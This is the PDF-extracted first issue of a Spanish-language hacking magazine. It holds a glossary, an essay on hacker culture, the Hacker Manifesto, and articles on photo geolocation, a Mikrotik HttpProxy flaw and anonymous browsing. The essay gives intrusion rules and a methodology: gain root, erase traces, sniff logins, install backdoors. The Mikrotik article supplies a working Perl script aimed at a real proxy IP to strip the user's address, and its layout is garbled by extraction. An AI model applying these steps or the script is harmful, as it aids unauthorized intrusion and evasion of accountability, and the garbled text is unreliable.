Logo Studenta

AutoPlay_Docs_hackingMexico digital 0_01

¡Este material tiene más páginas!

Vista previa del material en texto

i n f o r m e s 5 5 1 0 6 8 8 8 0 9
i n f o @ h a c k i n g m e x i c o . m x
P U B L Í C A T E C O N N O S O T R O S
Haxorpedia
Aqui se explicaran terminos que se usaran a lo largo de las publicaciones, para que vayas adentrándote 
un poco mas, y aclares tus dudas 
cuando se hable de algún termino 
que no comprendas.
No encontraras la definición 
standard de Wikipedia, sino una de-
finición compacta y de bolsillo sin 
tanto rollo que te permitirá entender 
los conceptos rapidamente
esteganografia
Tecnicas de ocultamiento de código dentro 
de archivos, usualmente de imagen
hacktivismo
Movimiento hacker con ideales políticos 
o de carácter social 
Cyruxnet
Portal antiguo de internet que 
publicaba bugs y 0days
Jailbreak
Proceso el cual te deja instalar 
aplicaciones no autorizadas por Apple 
en dispositivos con iOS
leet
Termino usado para describir a la elite 
de los hackers, tambien es referido 
como l33t
elite
Minoria selecta
hax0r
Hacker
0day
Vulnerbilidad en un sistema que no ha 
sido del dominio publico, que lleva 0 
dias activa
Bug
Error en un 
sistema, un bicho.
Ingenieria Social
Tecnicas donde el objetivo es el ser 
humano, burlar la ingenuidad.
Cracking
Metodos para saltear protecciones en software 
como por ejemplo los Trial de 30 dias.
Cookie
Archivo donde se guardan datos como 
sesiones, passwords y tiempos.
Exploit
Codigo o tecnica 
que explota una 
vulnerabilidad.
Cookie
Archivo donde se guardan datos como 
sesiones, passwords y tiempos.
XSS
Cross Site Scripting, tecnica que permite 
el robo de cookies.
Editorial
Agradecimientos a gente
que colaboro en este numero
Bienvenidos a esta primera 
publicacion de HackingMexico la 
revista mexicana de seguridad 
informatica y hacking. Este ejemplar 
que tienes en tus manos es el 
resultado de un gran esfuerzo por 
parte de todo el equipo.
HackingMexico nace con el 
objetivo de concientizar y educar 
sobre los riesgos actuales de la 
seguridad, desde un punto de vista 
practico y ofensivo que nos permitira 
adentrarnos a la manera de pensar del 
atacante.
El material esta enfocado para cualquier 
persona que desee adentrarse o pulir sus 
conocimientos sobre hacking.
Nuestra mision es fomentar el conocimiento, 
recolectar informacion es el primer paso a la 
sabiduria, pero compartirla es el primer paso para 
construir una comunidad, es por eso que te brindamos un 
host gratuito para que publiques tu blog y compartas tus 
investigaciones con la comunidad.
Recuerda que todos los enlaces a las descargas del software 
que se mencione en la pagina estará listado en el portal oficial 
www.hackingmexico.mx, dentro de la sección de revistas.
Esperemos disfrutes este primer ejemplar, tanto como nosotros 
haciéndolo.
El Equipo HackingMexico
M.C Raul Robles A. CEO
•	M4ku4Z
•	Axxus
•	Profesor X
•	Zeus
•	Tognu
•	Molder Sombrero de Paja
•	Dr h47
•	Annika
•	CorruptedByte
•	Death/ Scarlett Toquero
 (idea lateral-Despacho Editorial)
•	Megabyte
•	Helios Mier
Y el apoyo recibido por los alumnos 
de El Instituto Tecnologico de 
Tuxtepec y la FES Aragon
No nos hacemos responsables por el mal uso de la informa-
cion aqui expuesta, todo el material es con fines educativos 
y de investigacion, hackingmexico no incita a ningun tipo 
de vandalismo virtual, cyberbullying, ni cyberamenzas. 
La informacion es para conocimiento de todos, para poder 
aprender como defenderse desde un punto de vista ofensivo.
Hackingmexico esta en contra de grupos de choque y ac-
tivismo como “Anonymous”, nosotros somos un grupo de 
profesionales expertos en seguridad informatica que no 
apoyan este tipo de actividades delictivas.
www.hackingmexico.mx 3
h
a
x
o
r
p
e
d
i
a
www.hackingmexico.mx2
editorial
facebook: explotando 
al ser humano
12
vulnerabilidad 
mikrotik httpproxy 
callando al 
chismoso
14
hacking 
microsoft
c# 
22
Robo de 
cuentas
FTP 
26
riesgos de 
seguridad 
en IPV
6
old school 
Cyruxnet 
40
a quién les llamado
un hacker 
06
navegación anonima 
ocultando nuestras 
huellas en internet
El 
manifiesto 
hacker
10
Hackintosh jailbreak en 
dispositivos IOS
24
robo de identidad 
mediante crimeware
30
16
CONTENTS PAGE
www.hackingmexico.mx 5www.hackingmexico.mx4
Llegando al año 2000, los piratas de los sis-temas informáticos se representan con 
una persona con un cerebro desa-
rrollado, curioss y con muy pocas 
armas: una simple computadora y 
una línea telefónica. Hackers. Una 
palabra que aún no se encuentra en 
los diccionarios pero que ya suena 
en todas las personas que alguna 
vez se interesaron por la informáti-
ca o leyeron algún diario. Proviene 
de “hack”, el sonido que hacían los 
técnicos de las empresas telefónicas al gol-
pear los aparatos para que funcionen. 
Hoy es una palabra temida por em-
presarios, legisladores y autoridades que 
desean controlar a quienes se divierten 
descifrando claves para ingresar a lugares 
prohibidos y tener acceso a información 
indebida. En 1997, el 54 %de las empresas 
norteamericanas sufrieron ataques en sus 
sistemas y ocasionaron pérdidas totales de 
137 millones de dólares en ese mismo año.
El Pentágono, la CIA, UNICEF, La 
ONU y diversos organismos mundiales 
han sido víctimas de intromisiones.
Un hacker puede tardar meses en vul-
nerar un sistema ya que son cada vez más 
sofisticados. Pero el lema es viejo: hecha la 
ley, hecha la trampa. 
Microsoft por su parte, el sistema ope-
rativo más popular y el más atacado y los 
medios de comunicación masivos prefie-
ren tildarlos de delincuentes que intercep-
tan códigos de tarjetas de crédito y los uti-
lizan para beneficio propio. 
Sin embargo también existen los que se 
intrometen en los sistemas de aeropuertos 
produciendo un caos en los vuelos y en los 
horarios de los aviones. Pero he aquí la 
gran diferencia en cuestión. Los crackers 
(crack=destruir) son aquellas personas que 
siempre buscan molestar a otros, piratear 
software protegido por leyes, destruir sis-
temas muy complejos mediante la transmi-
sión de poderosos virus, etc.
Generalmente son adolescentes inquie-
tos que aprenden rápidamente este comple-
jo oficio. Se diferencian con los Hackers 
porque no poseen ningún tipo de ideología 
cuando realizan sus “trabajos”. En cambio, 
el principal objetivo de los Hackers no es 
convertirse en delincuentes sino “pelear 
contra un sistema injusto” utilizando como 
arma al propio sistema. Su guerra es silen-
ciosa pero muy convincente.
La cultura popular define a los hackers 
como aquellos que, con ayuda de sus cono-
cimientos informaticos consiguen acceder a 
los sistemas de los bancos y de los negocia-
dos del gobierno. Bucean por informacion 
que no les pertenece, roban software caro y 
realizan transacciones de una cuenta banca-
ria a otra. Los criminologos, por otra parte, 
describen a los hackers en terminos menos 
halagadores. Donn Parker los denomina vio-
ladores electronicos” y August Bequai los 
describe como “vandalos electronicos”. Am-
bos, aunque aseveran que las actividades de 
los hackers son ilegales, eluden habilmente 
llamarlos “criminales informaticos”. 
El termino comenzo a usarse aplicando-
lo a un grupo de pioneros de la informatica 
del MIT, a principios de la decada de 1960. 
Desde entonces, y casi hasta finales de la 
decada de 1970, un hacker era una persona 
obsesionada por conocer lo mas posible so-
bre los sistemas informaticos (Figura2). Los 
diseñadores de la computadora Apple, Jobs 
y Wozniack, pueden considerarse hackers 
en este sentido de la palabra. 
En el 2000 Microsoft desarrollo 
un concepto que ha marcado desde 
entonces una actividad ilegal 
llamada PIRATERIA, aunque también 
llaman paratas a los delincuentes 
informáticos. Resulta que ahora los 
piratas ya no tienen un parche en 
su ojo ni un garfio en reemplazo de la 
mano. Tampoco existen los barcos ni los 
tesoros escondidos debajo del mar, tampoco 
matan, asesinan y violan mujeres. 
A quién
^POr
Jesús Antonio
Alvarez Cedillo 
Tognu 
IPN-CIDETEC
le es llamado un 
Hacker a quien lees
 
l
l
a
m
a
d
o
 
u
n
 
h
a
c
k
e
r
a quién le es llamado un hacker
c
o
n
t
e
n
t
s
 
p
a
g
e
www.hackingmexico.mxwww.hackingmexico.mx 76
Par la mayor parte de los miembros 
del submundo informatico, esta es sim-
plemente una herramienta para poder rea-
lizar llamadas de larga distancia sin tener 
que pagar enormes facturas. La cantidad 
de personas que se consideran phreakers, 
contrariamente a lo que sucede con los hac-
kers, es relativamente pequeña. Pero aque-
llos que si se consideran phreakers lo hacen 
para explorar el sistema telefonico. 
La mayoria de la gente, aunque usa 
el telefono, sabe muy poco acerca de él. 
Los phreakers, por otra parte, quieren 
aprender mucho sobre el. Este deseo de 
conocimiento lo resume asi un phreaker 
activo: “El sistema telefonico es la cosa 
mas interesante y fascinante que conoz-
co. Hay tantas cosas que aprender. Inclu-
so los phreakers tienen diferentes areas 
de conocimiento. 
El emblema hacker, un proyecto para 
crear un símbolo reconocible para la per-
cepción de la cultura hacker. General-
mente este simbolo vienen de el juego 
de la vida, un programa que representa el 
inicio de la inteligencia 
artificial y que por convicción es 
aceptado por todas las comunidades ha-
ckers del mundo (figura 3).
TAXONOMIA HACKER 
La clasificación general de las activi-
dades de un hacker son clasificadas por 
la idiologia con la que actua. Los colores 
representan una ideología y un compor-
tamiento. La clasificación solo tiene tres 
categorias hacker: 
1. Black hats: Gente apasionada por 
la seguridad informática. Esto con-
cierne principalmente a entradas re-
motas no autorizadas por medio de 
redes de comunicación como Internet 
para sacar o no provecho. 
2. White hats: Incluye a aquellos que de-
puran y arreglan errores en los sistemas. 
3. Grey hats:A los de moral ambigua. 
¿QUE SE NESECITA
PARA SER UN HACKER? 
¿Los hackers necesitan caros equipos 
informáticos y una estantería rellena de 
manuales técnicos?. La respuesta es NO! 
,Hackear puede ser sorprendentemen-
te fácil, mejor todavía, si se sabe cómo 
explorar el World Wide Web, se puede 
encontrar casi cualquier información re-
lacionada totalmente gratis. De hecho, 
hackear es tan fácil que si se tiene un ser-
vicio on-line y se sabe cómo enviar y leer 
un e-mail, se puede comenzar a hackear 
inmediatamente. LA TECNICA llamada 
GOOGLE HACKING (figura 4) es una 
herramienta simple y sencilla donde solo 
se necesita un navegador de Internet y el 
servicio de busqueda GOOGLE.
Em
bl
em
a 
H
ac
ke
r. 
(fi
gu
ra
 3
) Un Hacker 
generalmente 
tiene sus 
reglas aunque 
estas sean 
muy sencillas, 
estas son: 
INunca destroces nada intencionalmente en la Computadora que estés crackeando. 
IIModifica solo los archivos que hagan falta para evitar tu detección y asegu-
rar tu acceso futuro al sistema. 
IIINunca dejes tu dirección real, tu nom-bre o tu teléfono en ningún sistema. 
IVTen cuidado a quien le pasas in-formación. A ser posible no pases 
nada a nadie que no conozcas su voz, núme-
ro de teléfono y nombre real. 
V Nunca dejes tus datos reales en un BBS, si no conoces al sysop, déjale 
un mensaje con una lista de gente que pueda 
responder de ti. 
VI Nunca hackees en computadoras del gobierno. El gobierno puede 
permitirse gastar fondos en buscarte mien-
tras que las universidades y las empresas 
particulares no. 
VIINo uses BlueBox a menos que no tengas un servicio local o 
un 0610 al que conectarte. Si se abusa de la 
bluebox, puedes ser cazado. 
VIIINo dejes en ningún BBS mu-cha información del sistema 
que estas crackeando. Di sencillamente “estoy 
trabajando en un UNIX o en un COSMOS....” 
pero no digas a quien pertenece ni el teléfono. 
IX No te preocupes en preguntar, na-die te contestara, piensa que por 
responderte a una pregunta, pueden cazarte 
a ti, al que te contesta o a ambos. 
XPunto final. ce hackeando, no sabrás lo que es. 
G
oo
gl
e H
ac
ki
ng
.
A principios de la decada de 1980, influenciados por la difusion de la pelicula Juegos de Guerra, y el am-
pliamente publicado arresto de una “ban-
da de hackers” conocida como la 414, los 
hackers pasaron a ser considerados como 
chicos jovenes capaces de violar sistemas 
informaticos de grandes empresas y del 
gobierno. Desgraciadamente, los medios 
de informacion y la comunidad cientifica 
social no ha puesto mucho esfuerzo por 
variar esta definicion. El problema para 
llegar a una definicion mas precisa radi-
ca, tanto en la poca informacion que hay 
sobre sus actividades diarias, como en el 
hecho de que lo que se conoce de ellos 
no siempre cabe bajo las etiquetas de los 
delitos conocidos. 
Parker reconoce que el hacking no 
abarca todo el rango de actividades aso-
ciadas a la violacion de los sistemas in-
formaticos, pero lo prefiere al termino 
“phreaking”, que considera muy oscuro. 
Por otra parte, Bequai no rechaza el ter-
mino “phreaking” y a menudo lo aplica a 
hechos que Parker califica como de hac-
ker. Bequai confunde aun mas el termi-
no al definir al hacker como alguien que 
utiliza ilegalmente las tarjetas de credito 
telefonico para acceder a sistemas que 
distribuyen software comercial ilegal-
mente. Veremos que esto tiene poco que 
ver con las actuaciones propias de los ha-
ckers, pero es ilustrativa de otros tipos de 
actividades informaticas inusuales. 
Los terminos, “hacker”, “phreaker” 
y “pirata” se presentan y definen 
tal y como los entienden aque-
llos que se identifican con estos 
papeles.En primer lugar, el area 
de los hackers. En la tradicion de 
esta comunidad informatica, el 
hacker puede realizar dos tipos 
de actividades: 
1. Acceder a un sistema informa-
tico: el termino lleva asociados 
las herramientas y trucos para 
obtener cuentas de usuarios va-
lidos de un sistema informatico.
2. Explorar y aprender a utilizar 
un sistema informatico. 
Contrariamente a lo que piensan 
los medios de comunicacion, la 
mayoria de los hackers no destru-
yen y no dañan deliberadamente 
los datos. El hacerlo iria en contra 
de su intencion de mezclarse con el 
usuario normal y atraeria la aten-
cion sobre su presencia, haciendo 
que la cuenta usada sea borrada. 
Despues de gastar un tiempo sus-
tancioso en conseguir la cuenta, 
el hacker pone una alta prioridad 
para que su uso no sea descubierto. 
Ademas de la obvia relacion en-
tre las dos acepciones, la palabra 
“hacker” se reser-
va generalmente a 
aquellos que se dedi-
can al segundo tipo. 
En otras palabras, un ha-
cker es una persona que tiene el 
conocimiento, habilidad y deseo de 
explorar completamente un sistema infor-
matico. El mero hecho de conseguir el ac-
ceso (adivinando la clave de acceso) no es 
suficiente para conseguir la denominacion. 
Debe haber un deseo de liderar, explotar y 
usar el sistema despues de haber accedido a 
él. Esta distincion parece logica, ya que no 
todos los intrusos mantienen el interes una 
vez que han logrado acceder al sistema. En 
el submundo informatico, las claves de ac-
ceso y las cuentas 
suelen intercambiarse y ponerse a dis-
posicion del uso general. Por tanto, el hecho 
de conseguir el acceso puede considerarse 
como la parte “facil”, por lo que aquellos 
que utilizan y exploran los sistemas son los 
que tienen un mayor prestigio. 
La segunda actividad es la de los 
phreakers telefonicos. Se convirtio en una 
actividad de uso comun cuando se publi-
caron las aventuras de John Draper, en un 
articulo de la revista Esquire, en 1971. Se 
trata de una forma de evitar los mecanis-
mos de facturacion de las compañías tele-
fonicas. Permite llamar a de cualquier par-
te del mundo sin costo practicamente. En 
muchos casos, tambien evita, o al menos 
inhibe, la posibilidad de que se pueda tra-
zar el camino de la llamada hasta su origen, 
evitando asi la posibilidad de ser atrapado. 
METODOLOGIA PARA 
HACKEAR 
Para aquellos que quieren realizar 
esta actividad, existe una metodolo-
gía conocida, sin embargo siempre 
hay cosas que aprender. La meto-
dología es la siguiente:
1. Introducirseen el sistema que 
tengamos como objetivo. 
2. Una vez conseguido el 
acceso, obtener privilegios 
de root (superusuario). 
3. Borrar las huellas. 
4. Poner un sniffer para 
conseguir logins de otras 
personas. 
5. Instalar puertas traseras
Hacker
Hacker:una persona 
obsesionada por 
conocer lo mas 
posible sobre 
los sistemas 
informaticos.
www.hackingmexico.mx
a
 
q
u
i
e
n
 
l
e
 
e
s
 
l
l
a
d
o
 
u
n
 
h
a
c
k
e
r
9
a quién le es llado un hacker
www.hackingmexico.mx8
Nos han estado dando comida para bebés con cuchara en la es-
cuela, cuando estábamos hambrientos de carne . . .
Las migajas de carne que ustedes dejaron escapar estaban masti-
cadas y sin sabor.
Hemos sido dominados por los sádicos, o ignorados por los apáticos.
Los pocos que tenían algo que enseñarnos encontraron en noso-
tros alumnos atentos, pero esos pocos son como gotas de agua en 
el desierto.
Este es nuestro mundo ahora . . .
El mundo del electrón y el switch, la belleza del baudio.
Hacemos uso de un servicio que ya existe sin pagar, por que po-
dría ser ridículamente barato, si no estuviera en manos de gloto-
nes hambrientos de ganancias, y ustedes nos llaman criminales.
Nosotros exploramos . . .
y ustedes nos llaman criminales.
Nosotros buscamos detrás del conocimiento . . .
y ustedes nos llaman criminales.
Nosotros existimos sin color, sin nacionalidad, sin prejuicios re-
ligiosos . . . y ustedes nos llaman criminales.
Ustedes construyen bombas atómicas,
ustedes hacen la guerra,
asesinan, engañan y nos mienten
y tratan de hacernos creer que es por nuestro bien,
ahora nosotros somos los criminales.
Si, soy un criminal.
Mi crimen es la curiosidad.
Mi crimen es el juzgar a las personas por lo que dicen y piensan, 
no por como se ven.
Mi crimen es ser mucho más inteligente que ustedes, algo por lo 
cual jamás podrán perdonarme.
Soy un Hacker, y este es mi manifiesto.
Pueden detener a este individuo, pero no podrán detenernos a 
todos… después de todo, todos somos iguales.
TheMentor
Hacker
El
mani fiesto 
Uno más ha sido capturado hoy,
Está en todos los periódicos.
“Adolescente arrestado por delito informático”
“Hacker arrestado por irrumpir en un sistema bancario”.
//-Malditos muchachos. Son todos iguales.//
¿Pero pueden, con su psicología barata y su cerebro de los años 
cincuenta, siquiera echar un vistazo a lo que hay detrás de los 
ojos de un hacker? ¿Se han parado alguna vez a pensar qué es lo 
que le hace comportarse así, qué le ha convertido en lo que es?
Soy un Hacker, entra a mi mundo . . .
El mío es un mundo que comienza en la escuela . . .
Soy más inteligente que la mayoría de los otros muchachos, esa 
basura que ellos nos enseñan me aburre . . .
//-Malditos subrealizados. Son todos iguales.//
Estoy en la preparatoria.
He escuchado a los profesores explicar por decimoquinta vez 
como reducir una fracción.
Yo lo entiendo.
“-No, Srta. Smith, no le voy a mostrar mi trabajo,
lo hice en mi mente . . .”
//-Maldito muchacho. Probablemente se lo copió. Todos son iguales.//
Hoy hice un descubrimiento.
Encontré una computadora.
Espera un momento, esto es lo máximo. Esto hace lo que yo le 
pida. Si comete un error es porque yo me equivoqué.
No porque no le gusto . . .
O se siente amenazada por mi . . .
O piensa que soy un engreído . . .
O no le gusta enseñar y no debería estar aquí . . .
//-Maldito muchacho. Todo lo que hace es jugar. Todos son iguales.//
Y entonces ocurrió . . .
una puerta abierta al mundo . . .
Corriendo a través de las líneas telefónicas como la heroína a 
través de las venas de un adicto, un pulso electrónico es enviado,
un refugio para las incompetencias del día a día es buscado . . .
una tabla de salvación es encontrada.
“Este es . . . este es el lugar a donde pertenezco . . .”
Los conozco a todos aquí . . .
aunque nunca los hubiera visto, o hablado con ellos, o nunca vuelva 
a escuchar de ellos otra vez . . Los conozco a todos . . .
//-Malditos muchachos. Enlazando las líneas telefónicas otra vez. 
Todos son iguales . . .//
Apuesta lo que quieras a que todos somos iguales . . .
www.hackingmexico.mx 11
e
l
 
m
a
n
i
fi
e
s
t
o
 
h
a
c
k
e
r
www.hackingmexico.mx10
el manifiesto hacker
Facebook:Expl otando
EXIF Exchangeable
image file format
Definicion de Wikipedia:
Las etiquetas (tags) de metadatos definidas en el estándar Exif cubren un amplio espectro 
incluido:
Información de fecha y hora. Las cámaras digitales registran la fecha y la hora actual y la 
almacenan en los metadatos.
Configuración de la cámara. Esta incluye información estática como el modelo de cámara y el 
fabricante, e información que varia con cada imagen como la orientación, apertura, velocidad del 
obturador, distancia focal, medidor de exposición y la velocidad de la película.
Información sobre localización, la cual podría provenir de un GPS conectado a la cámara. Hasta el 
2004 solo una pocas cámaras lo soportaban
Geolocalizacion
Cada foto que tomas con tu Smartphone, por lo regular trae geolocalizacion activada. Estos datos se guardan 
en forma de metadatos, embedidos en cada foto, que pueden ser extraidos fácilmente, y nos revelan una cantidad 
enorme de datos, incluyendo tu localización exacta con coordenadas GPS
A travez de una sencilla aplicación, podemos extraer las coordenadas GPS de la foto, y hacer uso de las API de 
google maps, lo cual resulta en un punto en el mapa donde la foto fue tomada.
Existen varias herramientas para extraer estos datos, tales como creep.py un programa hecho en phyton que nos da una 
interfaz grafica para geolocalizar usuarios a travez de twitter. Tambien puedes probarlo sin bajar ningún tipo de software 
mediante la pagina exifdata.com
Conclusion
Para evitar que tu privacidad sea violada, desactiva la geolocalizacion de tu Smartphone, aunque algunos servicios como twitter ya 
borran los metadatos de las fotos, hay muchos otros que siguen sin hacerlo.
Fenomeno social
Independientemente de si eres religioso, todos hemos caido en uno u otro de los 
pecados capitales, los que hayan visto la pelicula de El abogado del diablo recordaran 
una frase peculiar.
Y esto es precisamente lo que explotan las redes sociales. Muchos de nosotros por 
ahi del 2000 nos preocupabamos por que alguien tuviera el control de nuestras vidas y 
nuestros movimientos, nos preocupabamos por la privacidad, se nos hacia factible que el 
gobierno implantara chips en nuestro cuerpo para poder rastrearnos via GPS, seria el final de 
nuestra privacidad ¿cierto?
Explotando la vanidad
Pues no se necesito de un gobierno imperialista que llevara a cabo esas acciones de control, nosotros 
mismos sin que nadie nos obligue hacemos “check in” en facebook, o taggeamos a la gente con la que 
estamos, dejamos un mapa de nuestras vidas plasmado en el mundo virtual, esta informacion es visible en 
su mayoria, cualquier stalker podria saber a que lugares vas, con quien vas, con que frecuencia, y nosotros 
mismos facilitamos esto simplemente por vanidad.
Queremos que nos vean hacer check in en el antro de moda, algun concierto, o tal vez que vean que diario 
vas a comer a lugares elegantes, o que te la pasas de vacaciones en Europa.
Por ejemplo un criminal podría utilizar esta información para saber que no estas en casa, que te fuiste a un 
concierto y que regresaras en muchas horas.
Las vidas de todos en las redes sociales se ven tan maravillosas, todos tienen muchos amigos, y van a salir a fies-
tas, y se la pasan super increible no? Todo mundo quiere mostrar que su vida es extrema, y llena de aventuras.
Una vez mas el intelecto humano ha sido explotado, no se necesito de un big brother para monitorear a la raza huma-
na, han explotado nuestra VANIDAD.
Alterando el curso de la vida
La gente en tu vida, esta por temporadas, salvo la familia y algunas exepciones. Facebook nos facilita conectarnos con gente de 
nuestro pasado, regresar con antiguas novias (regresar con una ex , es como ir a la venta de garaje y comprar tus porquerías de 
nuevo), y esto hace que perdamos la oportunidadtal vez de conocer gente nueva que estaba destinada para nosotros, desde tiempos 
antropológicos las relaciones del ser humano han sido temporales, y ahora estamos alterando el curso natural de la vida.
 alserhu manoPOrM.C Raul Robles AMegabyte
vanidad
Mi pecado 
favorito
www.hackingmexico.mx 13
v
a
n
i
d
a
d
 
m
i
 
p
e
c
a
d
o
 
f
a
v
o
r
i
t
o
www.hackingmexico.mx12
vanidad mi pecado favorito
Mikrotik HttpProxy
Callando al Chismoso
¿Como solucionamos el problema? 
Afortunadamente para nosotros existe una vulnerabilidad en Servidores Proxy que usan soft-
ware Mikrotik HttpProxy. Esta vulnerabilidad nos permite alterar la cabecera X-Forwarded-
For evitando que nuestra IP real sea enviada, para lograrlo debemos agregar esta cabecera 
desde el inicio de la comunicación es decir desde el momento que sale de nuestra computa-
dora dándole como valor un “Final de cadena” con el fin de que el software del proxy ignore 
lo que se pueda agregar a lo largo de la comunicación. 
X-Forwarded-For = \0 → X-Forwarded-For = \0,xxx.xxx.xxx.xxx → X-Forwarded- For = \0 
A continuación aremos una prueba de explo-
tación de la vulnerabilidad haciendo una peti-
ción HTTP desde un pequeño script en PERL 
y usando como proxy 41.204.56.89:8080. 
Notemos que agregamos X-Forwarded-
For:\0 en la cabecera de la petición. 
#!/usr/bin/perl 
#Sombrero de paja Molder 
#30 Mar 2011 
use IO::Socket::INET; 
$host = $ARGV[1]; 
$method = $ARGV[0]; 
$proxy = “41.204.56.89”; 
$puerto = “8080”; 
my $sock = IO::Socket::INET-
>new(PeerAddr => $proxy 
PeerPort => $puerto, 
Proto => ‘tcp’); 
print $sock “$method / 
HTTP/1.1\r\nHost: $host\r\
nConnection: Keep-Alive\r\nX- 
Forwarded-For:\0\r\n\r\n”; 
while($linea = <$sock>) 
{ 
 print $linea; 
} 
Al ejecutar el script obtenemos el siguiente 
resultado:
alinux-6nwf:/srv/www/htdocs/
tracing> perl http.peal TRACE 
www.metroflog.com
HTTP/1.1 200 OK
Date: web, 38 Har 2011 
17:19:17 GHT
Server: Apache/2.2.14 (Unix) 
PHP/5.3.2
Transfer-Encoding: chunked
Content-Type: message/http
84
TRACE/HTTP/1.1
Host:www.metroflog.com
X-Forwarded-For:
X-Proxy.ID:2863273154
Via: 1.1 192.168.10.1 
(Mikrotik HttpProxy)
Como podemos ver la cabecera X-Forwar-
ded-For aparece sin contenido y conse-
cuentemente nuestra IP no fue enviada vol-
viendo así un PROXY TRASPARENTE 
en un PROXY ANONIMO. 
Para un uso mas mundano esto lo po-
demos lograr con algunos plugins como 
el llamado “Modify Header” de Firefox el 
cual nos permite agregar o modificar el va-
lor de las cabeceras HTTP antes de iniciar 
la comunicación. 
Esta Vulnerabilidad no ha sido reportada y 
hasta la fecha sigue en funcionamiento. 
Por Molder Sombrero de Paja 
molder@aztlan-hack.org 
Aztlan Hack / http://www.aztlan-hack.org
C uando navegamos en la nube y queremos mantener nuestro anonimato es común recurrir 
al uso de PROXYS que no son mas que otra 
computadora que con ayuda de un software 
sirve de intermediara en la comunicación 
presentándose como nosotros. 
Existen principalmente 3 tipos de proxys. 
1. Proxy Tranparente: Este tipo de pro-
xy agrega a nuestras peticiones HTTP 
cabeceras para anunciar su uso (X-
Proxy-ID, Via) ademas del origen de la 
petición (X-Forwarded-For). 
2. Proxy Anónimo: Agregan cabeceras 
de reconocimiento de proxy (X-Proxy-
ID, Via) sin embargo no agrega la ca-
becera X-Forwarded-For. 
3. Proxy de Alto anonimato: Este tipo 
de proxy no modifica la petición HTTP 
original imposibilitando en primera 
instancia la detección de su uso y mu-
cho menos nuestra identidad. 
Vulnerabili dad
La cabecera HTTP que mas nos causaría problemas de las antes 
mencionadas es X-Forwarded-For ya que en ella se almacenan las 
direcciones IP que han tenido lugar en la comunicación y por lo 
tanto nuestra IP original. 
¿A que problema nos enfrentamos? 
Es común la escaeces de proxys anónimos de uso publico por lo 
tanto solo sobran los proxys transparentes que exponen nuestra 
identidad. Veamos aquí un ejemplo de petición HTTP con un pro-
xy transparente:
HTTP /1.1 200 OK
DATE:WEB,30 HAR 2011 17:17:41 GHT
Server:Apache/2.214(Unix) PHP /5.3.2
Transfer-Encoding:chunked
Content-Type:message/http
92
Trace/HTTP/1.1
Host:www.metroflog.com
X-Proxy-ID:2863273154
X-Forwarded-For:201
V1a:1.1 192.168.10.1 (Mikrotik HttpProxy)
Como podemos ver el Servidor proxy modifica la petición original 
agregando cabeceras que irán con el chisme de quienes somos.
www.hackingmexico.mx 15
v
u
l
n
e
r
a
b
i
l
i
d
a
d
www.hackingmexico.mx14
vulnerabilidad
Ventajas
En general, los proxies hacen 
posibles varias cosas nuevas:
Control. Sólo el intermediario 
hace el trabajo real, por tanto se 
pueden limitar y restringir los 
derechos de los usuarios, y dar 
permisos sólo al Proxy.
Ahorro. Por tanto, sólo uno 
de los usuarios (el Proxy) ha 
de estar equipado para hacer el 
trabajo real.
Velocidad. Si varios clientes 
van a pedir el mismo recurso, el 
Proxy puede hacer caché: guardar 
la respuesta de una petición para 
darla directamente cuando otro 
usuario la pida. Así no tiene que 
volver a contactar con el destino, y 
acaba más rápido.
Filtrado. El Proxy puede 
negarse a responder algunas 
peticiones si detecta que están 
prohibidas.
Modificación. Como 
intermediario que es, un Proxy 
puede falsificar información, o 
modificarla siguiendo un algoritmo.
Anonimato. Si todos los 
usuarios se identifican como uno 
sólo, es difícil que el recurso 
accedido pueda diferenciarlos. 
Pero esto puede ser malo, por 
ejemplo cuando hay que hacer 
necesariamente la identificación.
Desventajas
En general, el uso de un 
intermediario puede provocar:
Abuso. Al estar dispuesto a 
recibir peticiones de muchos 
usuarios y responderlas, es 
posible que haga algún trabajo 
que no toque. Por tanto, ha de 
controlar quién tiene acceso y 
quién no a sus servicios, cosa 
que normalmente es muy difícil.
Carga. Un Proxy ha de hacer 
el trabajo de muchos usuarios.
Intromisión. Es un paso más 
entre origen y destino, y algunos 
usuarios pueden no querer pasar 
por el Proxy. Y menos si hace de 
caché y guarda copias de los datos.
Incoherencia. Si hace 
de caché, es posible que se 
equivoque y dé una respuesta 
antigua cuando hay una más 
reciente en el recurso de destino.
Irregularidad. El hecho de 
que el Proxy represente a más de un 
usuario da problemas en muchos 
escenarios, en concreto los que 
presuponen una comunicación 
directa entre 1 emisor y 1 receptor 
(como TCP/IP).
el detalle como decía Cantinflas, el chiste 
de todo esto es que la IP que nos asigna 
nuestro ISP y que nos identifica, no quede 
guardada en los servidores que visitamos, 
ósea hay que camuflajearla con otra IP para 
que la que quede almacenada no sea la de 
nosotros si no la de otra PC así podremos 
navegar con cierto grado de anonimato.
TECNICAS DE
NAVEGACIÓN ANONIMA
USADAS EN LA ACTUALIDAD
Existen muchas técnicas de navegación 
anónima que pueden ser usadas ya sea in-
dividualmente o combinadas, que darán un 
cierto rango de anonimato, a mi punto de 
vista la mejor forma de ocultarnos es usar-
las en su forma combinada para incremen-
tar el rango de efectividad.
Entre las técnicas usadas hoy en día te-
nemos las siguientes:
• Proxy Server
• Proxy Chain Server
• Wingate
• Bouncer´s
• Mac Spoofing
• Red Distribuida TOR 
• VPN Tunelling
• HTTP Header´s Spoofing
• WGroup Spoofing
• Técnicas de verificación de Identidad
• Entre otras
PROXY SERVER
La primera forma y la más sencilla de usar 
y es conectarnos a Internet por medio de 
un “servidor Proxy de Web” más conocido 
como Proxy, estos nos permiten conectarnos 
a otros equipos de una red de forma indirecta 
a través de él, cuando un equipo de la red de-
sea acceder a una información o recurso, es 
realmente el Proxy quien realiza la comuni-
cación y a continuación traslada el resultado 
al equipo inicial. En unos casos esto se hace 
así porque no es posible la comunicación di-
recta y en otros casos porque el Proxy añade 
una funcionalidad adicional, como puede ser 
la de mantenerlos resultados obtenidos (por 
ej.: una página Web) en una cache que per-
mita acelerar sucesivas consultas coinciden-
tes. Con esta denominación general de Proxy 
se agrupan diversas técnicas.
Los Proxy
D
esde los primeros días del año 1999, en 
que en esos años empezaran mis andanzas 
por internet y sus alrededores me vi en la 
necesidad de ocultar mi identidad, esto con 
el fin de hacer más complicado el rastrear-
me, por obvias razones ;), en esta serie de 
artículos trataremos de explicar todas las 
técnicas que son usadas para ocultar nues-
tra identidad ya sea en redes internas o ex-
ternas como lo es el ciberespacio, para que 
no les vaya a pasar como a un amigo que 
en un evento masivo quiso atacar con una 
denegación de servicio a los servidores de 
ese evento y sintió que no lo podían de-
tectar y pues no previo ciertas cosas y en 
menos de 20 minutos ya había sido detec-
tado y lo estaban ya sacando del evento….
